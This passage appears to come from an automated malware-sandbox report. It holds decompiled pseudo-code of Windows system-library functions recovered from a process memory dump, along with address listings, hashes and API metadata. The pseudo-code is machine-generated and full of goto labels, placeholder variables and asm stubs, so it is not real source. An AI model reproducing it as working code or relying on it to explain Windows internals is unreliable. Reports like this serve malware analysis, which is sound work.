						E0497F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L0498DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E0497B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E0497B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E0497E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E0497A890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                                                                  0x0493b171
                                                                  0x0493b171
                                                                  0x0493b171
                                                                  0x0493b171
                                                                  0x0493b171
                                                                  0x0493b176
                                                                  0x0493b17b
                                                                  0x0493b180
                                                                  0x0493b186
                                                                  0x0493b18f
                                                                  0x0493b198
                                                                  0x0493b1a4
                                                                  0x0493b1aa
                                                                  0x04994802
                                                                  0x04994802
                                                                  0x04994805
                                                                  0x0499480c
                                                                  0x0499480e
                                                                  0x0493b1d1
                                                                  0x0493b1d3
                                                                  0x0493b1de
                                                                  0x0493b1de
                                                                  0x04994817
                                                                  0x0499481e
                                                                  0x04994820
                                                                  0x04994822
                                                                  0x04994822
                                                                  0x04994824
                                                                  0x04994824
                                                                  0x0499482a
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x04994835
                                                                  0x0499483a
                                                                  0x0499483d
                                                                  0x0499483f
                                                                  0x04994842
                                                                  0x04994842
                                                                  0x04994842
                                                                  0x04994846
                                                                  0x0499484c
                                                                  0x0499484e
                                                                  0x04994851
                                                                  0x04994851
                                                                  0x04994853
                                                                  0x04994854
                                                                  0x04994854
                                                                  0x04994858
                                                                  0x0499485a
                                                                  0x0499485a
                                                                  0x0499485d
                                                                  0x0499485f
                                                                  0x04994861
                                                                  0x04994861
                                                                  0x04994866
                                                                  0x0499486b
                                                                  0x0499486e
                                                                  0x04994871
                                                                  0x04994876
                                                                  0x04994876
                                                                  0x04994878
                                                                  0x0499487b
                                                                  0x04994884
                                                                  0x04994884
                                                                  0x00000000
                                                                  0x0499487d
                                                                  0x0499487d
                                                                  0x04994882
                                                                  0x04994889
                                                                  0x04994889
                                                                  0x0499488f
                                                                  0x04994891
                                                                  0x049948e0
                                                                  0x049948e2
                                                                  0x049948e4
                                                                  0x049948e4
                                                                  0x049948e7
                                                                  0x049948e7
                                                                  0x049948ed
                                                                  0x049948f4
                                                                  0x049948f6
                                                                  0x04994951
                                                                  0x04994951
                                                                  0x04994953
                                                                  0x04994953
                                                                  0x04994956
                                                                  0x04994956
                                                                  0x04994958
                                                                  0x04994959
                                                                  0x04994959
                                                                  0x0499495d
                                                                  0x0499495d
                                                                  0x0499495f
                                                                  0x0499495f
                                                                  0x04994965
                                                                  0x04994969
                                                                  0x049949ba
                                                                  0x049949ba
                                                                  0x049949c1
                                                                  0x049949c5
                                                                  0x049949cc
                                                                  0x049949d4
                                                                  0x049949d7
                                                                  0x049949da
                                                                  0x049949e4
                                                                  0x049949e5
                                                                  0x049949f3
                                                                  0x04994a02
                                                                  0x00000000
                                                                  0x04994a02
                                                                  0x04994972
                                                                  0x04994974
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x04994976
                                                                  0x04994979
                                                                  0x04994982
                                                                  0x04994983
                                                                  0x04994984
                                                                  0x0499498b
                                                                  0x0499498d
                                                                  0x04994991
                                                                  0x04994993
                                                                  0x04994999
                                                                  0x0499499d
                                                                  0x049949a2
                                                                  0x049949a2
                                                                  0x049949a2
                                                                  0x04994999
                                                                  0x049949ac
                                                                  0x00000000
                                                                  0x049949b3
                                                                  0x049948f8
                                                                  0x049948fe
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049948fe
                                                                  0x04994895
                                                                  0x0499489c
                                                                  0x049948ad
                                                                  0x049948b2
                                                                  0x049948b5
                                                                  0x049948b7
                                                                  0x049948ba
                                                                  0x049948bc
                                                                  0x049948c6
                                                                  0x049948c6
                                                                  0x049948cb
                                                                  0x049948d1
                                                                  0x049948d4
                                                                  0x049948d8
                                                                  0x049948d8
                                                                  0x00000000
                                                                  0x049948d8
                                                                  0x049948be
                                                                  0x049948c0
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049948c2
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049948c4
                                                                  0x00000000
                                                                  0x04994882
                                                                  0x0499487b
                                                                  0x04994904
                                                                  0x04994906
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x04994908
                                                                  0x0499490e
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x04994910
                                                                  0x04994917
                                                                  0x04994917
                                                                  0x00000000
                                                                  0x04994917
                                                                  0x0493b1ba
                                                                  0x049947f9
                                                                  0x049947fc
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049947fc
                                                                  0x0493b1c0
                                                                  0x0493b1c0
                                                                  0x0493b1c3
                                                                  0x0493b1cb
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID: _vswprintf_s
                                                                  • String ID:
                                                                  • API String ID: 677850445-0
                                                                  • Opcode ID: e9de5de6e185ccbfd92339aa7ce8ac4fc06fd9bdcac374059798abe115b710e8
                                                                  • Instruction ID: eb8b3f95ffe7e4115bdd6cb527385f6861424be932295a804877bd32c709cdc8
                                                                  • Opcode Fuzzy Hash: e9de5de6e185ccbfd92339aa7ce8ac4fc06fd9bdcac374059798abe115b710e8
                                                                  • Instruction Fuzzy Hash: 8851CE71E082598EEF32CF688844BAEBBF5AF41714F1042BDD859AB281D7706D428B91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0494D5E0, Relevance: 1.6, Strings: 1, Instructions: 353COMMONCrypto
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 87%
                                                                  			E0494D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				signed int _t206;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				intOrPtr _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				unsigned int _t297;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				intOrPtr _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				intOrPtr* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t361;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x4a2d360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E04946600(0x4a252d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x4a27b9c; // 0x0
							_t281 = L04954620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E0497F3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x4a27b90; // 0x77df0000
								if(_t384 == 0) {
									_t353 =  *0x4a27b8c; // 0x293d80
									_v176 = _t353;
									_t63 = _t353 + 0x50; // 0x293e30
									_t64 =  *_t63 + 0x20; // 0x9
									_t320 =  *_t64;
									_v184 = _t320;
								} else {
									E04952280(_t200, 0x4a284d8);
									_t277 =  *0x4a285f4; // 0x294250
									_t351 =  *0x4a285f8 & 1;
									while(_t277 != 0) {
										_t21 = _t277 - 0x50; // 0x76760000
										_t337 =  *_t21;
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t23 = _t277 - 0x18; // 0x294298
													_t340 =  *_t23;
													_t24 = _t277 - 0x68; // 0x2941e8
													_t353 = _t24;
													_v176 = _t353;
													__eflags =  *((intOrPtr*)(_t340 + 0xc)) - 0xffffffff;
													if( *((intOrPtr*)(_t340 + 0xc)) != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t30 = _t353 + 0x50; // 0x294298
															_t340 =  *_t30;
														}
													}
													_t31 = _t340 + 0x20; // 0x9
													_v184 =  *_t31;
												}
											} else {
												_t22 = _t277 + 4; // 0x294c30
												_t339 =  *_t22;
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E0494FFB0(_t287, _t353, 0x4a284d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E0498CC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E04946600(0x4a252d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E04947926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x4a2b239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E049BE974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x4a28472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														_t361 =  *0x4a2b218; // 0x0
														asm("ror edi, cl");
														 *0x4a2b1e0( &_v192, _t353, _v168, 0, _v180);
														 *(_t361 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E04952280(_t250, 0x4a284d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L04973898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E0494FFB0(_t293, _t353, 0x4a284d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E049737F5(_t353, 0);
																}
																E04970413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E04969B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E049602D6(_t174);
																}
																L049577F0( *0x4a27b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E0496C277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L0494EC7F(_t353);
										L049619B8(_t287, 0, _t353, 0);
										_t200 = E0493F4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L049577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E0497B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_t206 =  *0x4a2b2f8; // 0xd50000
									if((_t206 |  *0x4a2b2fc) == 0 || ( *0x4a2b2e4 & 0x00000001) != 0) {
										goto L46;
									} else {
										_t297 =  *0x4a2b2ec; // 0x100
										_v200 = 0;
										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
											_t355 = _v168;
											_t342 =  &_v208;
											_t208 = E049E6B68(_v168,  &_v208, _v168, __eflags);
											__eflags = _t208 - 1;
											if(_t208 == 1) {
												goto L46;
											} else {
												__eflags = _v208 & 0x00000010;
												if((_v208 & 0x00000010) == 0) {
													goto L46;
												} else {
													_t342 = 4;
													_t366 = E049E6AEB(_t355, 4,  &_v216);
													__eflags = _t366;
													if(_t366 >= 0) {
														goto L46;
													} else {
														asm("int 0x29");
														_t356 = 0;
														_v44 = 0;
														_t290 = _v52;
														__eflags = 0;
														if(0 == 0) {
															L108:
															_t356 = 0;
															_v44 = 0;
															goto L63;
														} else {
															__eflags = 0;
															if(0 < 0) {
																goto L108;
															}
															L63:
															_v112 = _t356;
															__eflags = _t356;
															if(_t356 == 0) {
																L143:
																_v8 = 0xfffffffe;
																_t211 = 0xc0000089;
															} else {
																_v36 = 0;
																_v60 = 0;
																_v48 = 0;
																_v68 = 0;
																_v44 = _t290 & 0xfffffffc;
																E0494E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
																_t306 = _v68;
																__eflags = _t306;
																if(_t306 == 0) {
																	_t216 = 0xc000007b;
																	_v36 = 0xc000007b;
																	_t307 = _v60;
																} else {
																	__eflags = _t290 & 0x00000001;
																	if(__eflags == 0) {
																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																		__eflags = _t349 - 0x10b;
																		if(_t349 != 0x10b) {
																			__eflags = _t349 - 0x20b;
																			if(_t349 == 0x20b) {
																				goto L102;
																			} else {
																				_t307 = 0;
																				_v48 = 0;
																				_t216 = 0xc000007b;
																				_v36 = 0xc000007b;
																				goto L71;
																			}
																		} else {
																			L102:
																			_t307 =  *(_t306 + 0x50);
																			goto L69;
																		}
																		goto L151;
																	} else {
																		_t239 = L0494EAEA(_t290, _t290, _t356, _t366, __eflags);
																		_t307 = _t239;
																		_v60 = _t307;
																		_v48 = _t307;
																		__eflags = _t307;
																		if(_t307 != 0) {
																			L70:
																			_t216 = _v36;
																		} else {
																			_push(_t239);
																			_push(0x14);
																			_push( &_v144);
																			_push(3);
																			_push(_v44);
																			_push(0xffffffff);
																			_t319 = E04979730();
																			_v36 = _t319;
																			__eflags = _t319;
																			if(_t319 < 0) {
																				_t216 = 0xc000001f;
																				_v36 = 0xc000001f;
																				_t307 = _v60;
																			} else {
																				_t307 = _v132;
																				L69:
																				_v48 = _t307;
																				goto L70;
																			}
																		}
																	}
																}
																L71:
																_v72 = _t307;
																_v84 = _t216;
																__eflags = _t216 - 0xc000007b;
																if(_t216 == 0xc000007b) {
																	L150:
																	_v8 = 0xfffffffe;
																	_t211 = 0xc000007b;
																} else {
																	_t344 = _t290 & 0xfffffffc;
																	_v76 = _t344;
																	__eflags = _v40 - _t344;
																	if(_v40 <= _t344) {
																		goto L150;
																	} else {
																		__eflags = _t307;
																		if(_t307 == 0) {
																			L75:
																			_t217 = 0;
																			_v104 = 0;
																			__eflags = _t366;
																			if(_t366 != 0) {
																				__eflags = _t290 & 0x00000001;
																				if((_t290 & 0x00000001) != 0) {
																					_t217 = 1;
																					_v104 = 1;
																				}
																				_t290 = _v44;
																				_v52 = _t290;
																			}
																			__eflags = _t217 - 1;
																			if(_t217 != 1) {
																				_t369 = 0;
																				_t218 = _v40;
																				goto L91;
																			} else {
																				_v64 = 0;
																				E0494E9C0(1, _t290, 0, 0,  &_v64);
																				_t309 = _v64;
																				_v108 = _t309;
																				__eflags = _t309;
																				if(_t309 == 0) {
																					goto L143;
																				} else {
																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																					__eflags = _t226 - 0x10b;
																					if(_t226 != 0x10b) {
																						__eflags = _t226 - 0x20b;
																						if(_t226 != 0x20b) {
																							goto L143;
																						} else {
																							_t371 =  *(_t309 + 0x98);
																							goto L83;
																						}
																					} else {
																						_t371 =  *(_t309 + 0x88);
																						L83:
																						__eflags = _t371;
																						if(_t371 != 0) {
																							_v80 = _t371 - _t356 + _t290;
																							_t310 = _v64;
																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																							_t292 =  *(_t310 + 6) & 0x0000ffff;
																							_t311 = 0;
																							__eflags = 0;
																							while(1) {
																								_v120 = _t311;
																								_v116 = _t348;
																								__eflags = _t311 - _t292;
																								if(_t311 >= _t292) {
																									goto L143;
																								}
																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
																								__eflags = _t371 - _t359;
																								if(_t371 < _t359) {
																									L98:
																									_t348 = _t348 + 0x28;
																									_t311 = _t311 + 1;
																									continue;
																								} else {
																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																										goto L98;
																									} else {
																										__eflags = _t348;
																										if(_t348 == 0) {
																											goto L143;
																										} else {
																											_t218 = _v40;
																											_t312 =  *_t218;
																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																												_v100 = _t359;
																												_t360 = _v108;
																												_t372 = L04948F44(_v108, _t312);
																												__eflags = _t372;
																												if(_t372 == 0) {
																													goto L143;
																												} else {
																													_t290 = _v52;
																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E04973C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																													_t307 = _v72;
																													_t344 = _v76;
																													_t218 = _v40;
																													goto L91;
																												}
																											} else {
																												_t290 = _v52;
																												_t307 = _v72;
																												_t344 = _v76;
																												_t369 = _v80;
																												L91:
																												_t358 = _a4;
																												__eflags = _t358;
																												if(_t358 == 0) {
																													L95:
																													_t308 = _a8;
																													__eflags = _t308;
																													if(_t308 != 0) {
																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
																													}
																													_v8 = 0xfffffffe;
																													_t211 = _v84;
																												} else {
																													_t370 =  *_t218 - _t369 + _t290;
																													 *_t358 = _t370;
																													__eflags = _t370 - _t344;
																													if(_t370 <= _t344) {
																														L149:
																														 *_t358 = 0;
																														goto L150;
																													} else {
																														__eflags = _t307;
																														if(_t307 == 0) {
																															goto L95;
																														} else {
																															__eflags = _t370 - _t344 + _t307;
																															if(_t370 >= _t344 + _t307) {
																																goto L149;
																															} else {
																																goto L95;
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																								goto L97;
																							}
																						}
																						goto L143;
																					}
																				}
																			}
																		} else {
																			__eflags = _v40 - _t307 + _t344;
																			if(_v40 >= _t307 + _t344) {
																				goto L150;
																			} else {
																				goto L75;
																			}
																		}
																	}
																}
															}
															L97:
															 *[fs:0x0] = _v20;
															return _t211;
														}
													}
												}
											}
										} else {
											goto L46;
										}
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}








































































































                                                                  0x0494d5f2
                                                                  0x0494d5f5
                                                                  0x0494d5f5
                                                                  0x0494d5fd
                                                                  0x0494d600
                                                                  0x0494d60a
                                                                  0x0494d60d
                                                                  0x0494d617
                                                                  0x0494d61d
                                                                  0x0494d627
                                                                  0x0494d62e
                                                                  0x0494d911
                                                                  0x0494d913
                                                                  0x00000000
                                                                  0x0494d919
                                                                  0x0494d919
                                                                  0x0494d919
                                                                  0x0494d634
                                                                  0x0494d634
                                                                  0x0494d634
                                                                  0x0494d634
                                                                  0x0494d640
                                                                  0x0494d8bf
                                                                  0x00000000
                                                                  0x0494d646
                                                                  0x0494d646
                                                                  0x0494d64d
                                                                  0x0494d652
                                                                  0x0499b2fc
                                                                  0x0499b2fc
                                                                  0x0499b302
                                                                  0x0499b33b
                                                                  0x0499b341
                                                                  0x00000000
                                                                  0x0499b304
                                                                  0x0499b304
                                                                  0x0499b319
                                                                  0x0499b31e
                                                                  0x0499b324
                                                                  0x0499b326
                                                                  0x0499b332
                                                                  0x0499b347
                                                                  0x0499b34c
                                                                  0x0499b351
                                                                  0x0499b35a
                                                                  0x00000000
                                                                  0x0499b328
                                                                  0x0499b328
                                                                  0x00000000
                                                                  0x0499b328
                                                                  0x0499b326
                                                                  0x0494d658
                                                                  0x0494d658
                                                                  0x0494d65b
                                                                  0x0494d665
                                                                  0x00000000
                                                                  0x0494d66b
                                                                  0x0494d66b
                                                                  0x0494d66b
                                                                  0x0494d66b
                                                                  0x0494d66d
                                                                  0x0494d672
                                                                  0x0494d67a
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0494d680
                                                                  0x0494d686
                                                                  0x0494d8ce
                                                                  0x0494d8d4
                                                                  0x0494d8da
                                                                  0x0494d8dd
                                                                  0x0494d8dd
                                                                  0x0494d8e0
                                                                  0x0494d68c
                                                                  0x0494d691
                                                                  0x0494d69d
                                                                  0x0494d6a2
                                                                  0x0494d6a7
                                                                  0x0494d6b0
                                                                  0x0494d6b0
                                                                  0x0494d6b5
                                                                  0x0494d6e0
                                                                  0x0494d6b7
                                                                  0x0494d6b7
                                                                  0x0494d6b9
                                                                  0x0494d6b9
                                                                  0x0494d6bb
                                                                  0x0494d6bd
                                                                  0x0494d6ce
                                                                  0x0494d6d0
                                                                  0x0494d6d2
                                                                  0x0499b363
                                                                  0x0499b365
                                                                  0x00000000
                                                                  0x0499b36b
                                                                  0x00000000
                                                                  0x0499b36b
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0494d6bf
                                                                  0x0494d6bf
                                                                  0x0494d6e5
                                                                  0x0494d6e7
                                                                  0x0494d6e9
                                                                  0x0494d6e9
                                                                  0x0494d6ec
                                                                  0x0494d6ec
                                                                  0x0494d6ef
                                                                  0x0494d6f5
                                                                  0x0494d6f9
                                                                  0x0494d6fb
                                                                  0x0494d6fd
                                                                  0x0494d701
                                                                  0x0494d703
                                                                  0x0494d70a
                                                                  0x0494d70a
                                                                  0x0494d70a
                                                                  0x0494d701
                                                                  0x0494d70d
